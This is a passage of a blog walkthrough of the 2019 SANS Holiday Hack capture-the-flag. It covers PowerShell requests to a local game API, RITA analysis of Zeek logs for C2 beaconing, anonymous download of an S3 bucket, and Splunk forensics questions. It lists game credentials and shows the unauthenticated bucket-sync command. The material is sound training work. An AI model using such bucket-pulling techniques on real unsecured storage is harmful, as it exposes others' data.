&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;127&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1225&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;api&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;angle&lt;/span&gt;&lt;span class="k"&gt;?&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;65&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;5&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;RawContent&lt;/span&gt;
&lt;span class="go"&gt;HTTP/1.0 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Server: Werkzeug/0.16.0&lt;/span&gt;
&lt;span class="go"&gt;Server: Python/3.6.9&lt;/span&gt;
&lt;span class="go"&gt;Date: Tue, 24 Dec 2019 11:42:25 GMT&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 77&lt;/span&gt;

&lt;span class="go"&gt;Updated Mirror Angle - Check /api/output if 5 Mega-Jollies per liter reached.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now the refraction:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;127&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1225&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;api&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;refraction&lt;/span&gt;&lt;span class="k"&gt;?&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;867&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;RawContent&lt;/span&gt;
&lt;span class="go"&gt;HTTP/1.0 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Server: Werkzeug/0.16.0&lt;/span&gt;
&lt;span class="go"&gt;Server: Python/3.6.9&lt;/span&gt;
&lt;span class="go"&gt;Date: Tue, 24 Dec 2019 11:42:30 GMT&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 87&lt;/span&gt;

&lt;span class="go"&gt;Updated Lense Refraction Level - Check /api/output if 5 Mega-Jollies per liter reached.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then the temperature:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;127&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1225&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;api&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;temperature&lt;/span&gt;&lt;span class="k"&gt;?&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;=-&lt;/span&gt;&lt;span class="n"&gt;33&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;5&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;RawContent&lt;/span&gt;
&lt;span class="go"&gt;HTTP/1.0 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Server: Werkzeug/0.16.0&lt;/span&gt;
&lt;span class="go"&gt;Server: Python/3.6.9&lt;/span&gt;
&lt;span class="go"&gt;Date: Tue, 24 Dec 2019 11:42:34 GMT&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 82&lt;/span&gt;

&lt;span class="go"&gt;Updated Laser Temperature - Check /api/output if 5 Mega-Jollies per liter reached.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And finally the gas levels:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nv"&gt;$correct_gases_postbody&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;@{&lt;/span&gt; &lt;span class="n"&gt;O&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;6&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;H&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;7&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;He&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;3&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;4&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;Ne&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;22&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;Ar&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;11&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;Xe&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;10&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;F&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;20&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;Kr&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;Rn&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;9&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="n"&gt;-Uri&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;127&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1225&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;api&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;gas&lt;/span&gt; &lt;span class="n"&gt;-Method&lt;/span&gt; &lt;span class="n"&gt;POST&lt;/span&gt; &lt;span class="n"&gt;-Body&lt;/span&gt; &lt;span class="nv"&gt;$correct_gases_postbody&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;RawContent&lt;/span&gt;
&lt;span class="go"&gt;HTTP/1.0 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Server: Werkzeug/0.16.0&lt;/span&gt;
&lt;span class="go"&gt;Server: Python/3.6.9&lt;/span&gt;
&lt;span class="go"&gt;Date: Tue, 24 Dec 2019 11:42:45 GMT&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 81&lt;/span&gt;

&lt;span class="go"&gt;Updated Gas Measurements - Check /api/output if 5 Mega-Jollies per liter reached.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Aaaaand:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;127&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1225&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;api&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;RawContent&lt;/span&gt;
&lt;span class="go"&gt;HTTP/1.0 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Server: Werkzeug/0.16.0&lt;/span&gt;
&lt;span class="go"&gt;Server: Python/3.6.9&lt;/span&gt;
&lt;span class="go"&gt;Date: Mon, 30 Dec 2019 12:39:57 GMT&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 58&lt;/span&gt;

&lt;span class="go"&gt;Failure - Only 2.17 Mega-Jollies of Laser Output Reached!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It didn't work! Hmm, maybe we should try &lt;a class="reference external" href="https://www.youtube.com/watch?v=p85xwZ_OLX0"&gt;turning it off and on again?&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;127&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1225&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;api&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;off&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;RawContent&lt;/span&gt;
&lt;span class="go"&gt;HTTP/1.0 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Server: Werkzeug/0.16.0&lt;/span&gt;
&lt;span class="go"&gt;Server: Python/3.6.9&lt;/span&gt;
&lt;span class="go"&gt;Date: Mon, 30 Dec 2019 12:40:12 GMT&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 33&lt;/span&gt;

&lt;span class="go"&gt;Christmas Cheer Laser Powered Off&lt;/span&gt;
&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;127&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1225&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;api&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;on&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;RawContent&lt;/span&gt;
&lt;span class="go"&gt;HTTP/1.0 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Server: Werkzeug/0.16.0&lt;/span&gt;
&lt;span class="go"&gt;Server: Python/3.6.9&lt;/span&gt;
&lt;span class="go"&gt;Date: Mon, 30 Dec 2019 12:40:18 GMT&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 32&lt;/span&gt;

&lt;span class="go"&gt;Christmas Cheer Laser Powered On&lt;/span&gt;
&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;127&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1225&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;api&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;RawContent&lt;/span&gt;
&lt;span class="go"&gt;HTTP/1.0 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Server: Werkzeug/0.16.0&lt;/span&gt;
&lt;span class="go"&gt;Server: Python/3.6.9&lt;/span&gt;
&lt;span class="go"&gt;Date: Mon, 30 Dec 2019 12:40:21 GMT&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 200&lt;/span&gt;

&lt;span class="go"&gt;Success! - 5.47 Mega-Jollies of Laser Output Reached!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There you go!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="network-log-analysis-determine-compromised-system"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id13"&gt;Network Log Analysis: Determine Compromised System&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're given &lt;a class="reference external" href="https://downloads.elfu.org/elfu-zeeklogs.zip"&gt;Zeek logs&lt;/a&gt; to try
and identify the IP address of the infected computer. Among the log files,
we can see some HTML files. Let's open them in our browser:&lt;/p&gt;
&lt;img alt="rita_index.png" class="align-center" src="/images/sans-christmas-challenge-2019/rita_index.png" /&gt;
&lt;p&gt;We have the web interface to &lt;a class="reference external" href="https://github.com/activecm/rita"&gt;RITA&lt;/a&gt;, the
Real Intelligence Threat Analytics tool. It can ingest Bro or Zeek logs, and
detect several suspicious behaviour on the network, including &lt;strong&gt;beaconing
behaviour&lt;/strong&gt;. This means that it can likely help us identify the machine that
was infected, and is likely taking order from a &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Botnet#Command_and_control"&gt;C2 server&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's go over the &amp;quot;Beacons&amp;quot; tab:&lt;/p&gt;
&lt;img alt="rita_beacons.png" class="align-center" src="/images/sans-christmas-challenge-2019/rita_beacons.png" /&gt;
&lt;p&gt;By far, the most suspicious activity seems to be between internal IP
&lt;code&gt;192.168.134.130&lt;/code&gt; and external IP &lt;code&gt;144.202.46.214&lt;/code&gt;. This means that
the infected machine is likely &lt;code&gt;192.168.134.130&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-6-splunk"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id14"&gt;Objective 6: Splunk&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Now that we have solved objectives 2 through 5, let's go talk to Santa again.&lt;/p&gt;
&lt;img alt="santa_squad.png" class="align-center" src="/images/sans-christmas-challenge-2019/santa_squad.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Thank you for finding &lt;a class="reference external" href="https://disney.fandom.com/wiki/Jane_Banks"&gt;Jane&lt;/a&gt;
and &lt;a class="reference external" href="https://disney.fandom.com/wiki/Michael_Banks"&gt;Michael&lt;/a&gt;, our two
turtle doves!&lt;/p&gt;
&lt;p&gt;I’ve got an uneasy feeling about how they disappeared.&lt;/p&gt;
&lt;p&gt;Turtle doves wouldn’t wander off like that.&lt;/p&gt;
&lt;p&gt;Someone must have stolen them! Please help us find the thief!&lt;/p&gt;
&lt;p&gt;It’s a moral imperative!&lt;/p&gt;
&lt;p&gt;I think you should look for an entrance to the steam tunnels and solve Challenge 6 and 7 too!&lt;/p&gt;
&lt;p&gt;Gosh, I can’t help but think:&lt;/p&gt;
&lt;p&gt;Winds in the East, snow coming in…&lt;/p&gt;
&lt;p&gt;Like something is brewing and about to begin!&lt;/p&gt;
&lt;p&gt;Can’t put my finger on what lies in store,&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://www.youtube.com/watch?v=SSfGBskfthg"&gt;But I fear what’s to happen all happened before!&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We're asked to contact the Elf U SOC team via their &lt;a class="reference external" href="https://splunk.elfu.org/"&gt;Splunk server&lt;/a&gt;
(credentials &lt;code&gt;elf:elfsocks&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;We first have a little chat with Kent:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Guest (me):&lt;/strong&gt; Hi Kent :-)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kent:&lt;/strong&gt; Hi yourself.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Guest (me):&lt;/strong&gt; I ran into Professor Banas. He said you contacted him about
his computer being hacked?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kent:&lt;/strong&gt; Oh, well lots of analysts try to make it here in the ELF U SOC,
but most of them crack under the pressure&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Guest (me):&lt;/strong&gt; Well, can I help?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kent:&lt;/strong&gt; You can try. Go check out #ELFU SOC. Maybe someone there will
have time to bring you up to speed. Here's a tip, click on those blinking
red dots to the left column and read very carefully.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Guest (me):&lt;/strong&gt; Thanks???&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Alright, Kent... Way to be an ass. Anyway, let's check the #ELFU SOC channel:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Cosmo Jingleberg:&lt;/strong&gt; Hey did you all see that beaconing detection from
RITA?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Zippy Frostington:&lt;/strong&gt; Yep. And we have some system called 'sweetums' here
on campus communicating with the same weird IP&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Alice Bluebird:&lt;/strong&gt; Gah... that's Professor Banas' system from over in the
Polar Studies department&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Guest (me):&lt;/strong&gt; That's why I'm here, actually...Kent sent me to this
channel to help with Prof. Banas' system&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Alice Bluebird:&lt;/strong&gt; smh...I'll DM you&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And in DM with Alice:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Alice Bluebird:&lt;/strong&gt; Okay. Your goal is to find the message for Kent that
the adversary embedded in this attack.&lt;/p&gt;
&lt;p&gt;If you think you have the chops for that, don't let me slow you down. Get
searching and enter the Challenge Question answer when you've found it.&lt;/p&gt;
&lt;p&gt;You'll need to know some things, though:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;We use Splunk, so click &lt;a class="reference external" href="https://splunk.elfu.org/en-US/app/SA-elfusoc/search"&gt;here&lt;/a&gt;
or hit the Search link in the navigation up above to get started.&lt;/li&gt;
&lt;li&gt;I copied some raw files &lt;a class="reference external" href="http://elfu-soc.s3-website-us-east-1.amazonaws.com/"&gt;here&lt;/a&gt;
or click the File Archive link in the navigation. (You'll find some
references to the File Archive contents in Splunk)&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;You'll need to use both of these resources to answer the Challenge
Question!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Don't worry though, I can get you started down the right path with a few
hints if you need 'em. All you have to do is answer the first training
question. If you've read all the chat windows here, you already have the
answer ;-)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="section" id="answering-the-challenge-question"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id15"&gt;Answering the challenge question&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Alright, we're supposed to find the message the attacker left for Kent. Alice
says that we need both the Splunk search tool and the raw file archive to
answer this question. However, just using the file archive is possible.&lt;/p&gt;
&lt;p&gt;By taking a look at the &lt;a class="reference external" href="http://elfu-soc.s3-website-us-east-1.amazonaws.com/"&gt;file archive&lt;/a&gt;
URL, we can see that it's hosted on an AWS S3 bucket. Browsing the web
interface is not super practical, so let's download the bucket using the &lt;a class="reference external" href="https://aws.amazon.com/cli/"&gt;AWS
CLI&lt;/a&gt; tools:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; aws s3 sync s3://elfu-soc . --no-sign-request --region us-east-1
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;--no-sign-request&lt;/code&gt; flag is used to tell the tool that we don't
want to try to authenticate: we want to download the S3 content as an
anonymous user.&lt;/p&gt;
&lt;p&gt;We can now search the raw files for mentions of Kent:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;stoQ  Artifacts&amp;quot;&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; grep -Rn &lt;span class="s1"&gt;&amp;#39;Kent&amp;#39;&lt;/span&gt; .
&lt;span class="go"&gt;./home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4:2:&amp;lt;cp:coreProperties xmlns:cp=&amp;quot;http://schemas.openxmlformats.org/package/2006/metadata/core-properties&amp;quot; xmlns:dc=&amp;quot;http://purl.org/dc/elements/1.1/&amp;quot; xmlns:dcterms=&amp;quot;http://purl.org/dc/terms/&amp;quot; xmlns:dcmitype=&amp;quot;http://purl.org/dc/dcmitype/&amp;quot; xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot;&amp;gt;&amp;lt;dc:title&amp;gt;Holiday Cheer Assignment&amp;lt;/dc:title&amp;gt;&amp;lt;dc:subject&amp;gt;19th Century Cheer&amp;lt;/dc:subject&amp;gt;&amp;lt;dc:creator&amp;gt;Bradly Buttercups&amp;lt;/dc:creator&amp;gt;&amp;lt;cp:keywords&amp;gt;&amp;lt;/cp:keywords&amp;gt;&amp;lt;dc:description&amp;gt;Kent you are so unfair. And we were going to make you the king of the Winter Carnival.&amp;lt;/dc:description&amp;gt;&amp;lt;cp:lastModifiedBy&amp;gt;Tim Edwards&amp;lt;/cp:lastModifiedBy&amp;gt;&amp;lt;cp:revision&amp;gt;4&amp;lt;/cp:revision&amp;gt;&amp;lt;dcterms:created xsi:type=&amp;quot;dcterms:W3CDTF&amp;quot;&amp;gt;2019-11-19T14:54:00Z&amp;lt;/dcterms:created&amp;gt;&amp;lt;dcterms:modified xsi:type=&amp;quot;dcterms:W3CDTF&amp;quot;&amp;gt;2019-11-19T17:50:00Z&amp;lt;/dcterms:modified&amp;gt;&amp;lt;cp:category&amp;gt;&amp;lt;/cp:category&amp;gt;&amp;lt;/cp:coreProperties&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The message is &lt;code&gt;Kent you are so unfair. And we were going to make you the
king of the Winter Carnival.&lt;/code&gt;. We got the correct answer, and we didn't need to
use Splunk!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="answering-the-training-questions"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id16"&gt;Answering the training questions&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;However, the SANS Challenges are about learning new skills. Being on the red
side of infosec, I don't often see how the blue team operates. So I thought it
would be fun to try and learn how to search for an attacker using Splunk.&lt;/p&gt;
&lt;p&gt;So let's answer the training questions!&lt;/p&gt;
&lt;div class="section" id="first-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id17"&gt;First question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;What is the short host name of Professor Banas' computer?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This one is easy, we can find the info in the #ELFU SOC chan: &lt;code&gt;sweetums&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="second-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id18"&gt;Second question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;What is the name of the sensitive file that was likely accessed and copied
by the attacker? Please provide the fully qualified location of the file.
(Example: C:tempreport.pdf)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By DM, Alice tells us that the Elf U staff is worried that the attacker may
have accessed Santa's sensitive data. So let's search for &lt;code&gt;santa&lt;/code&gt; in
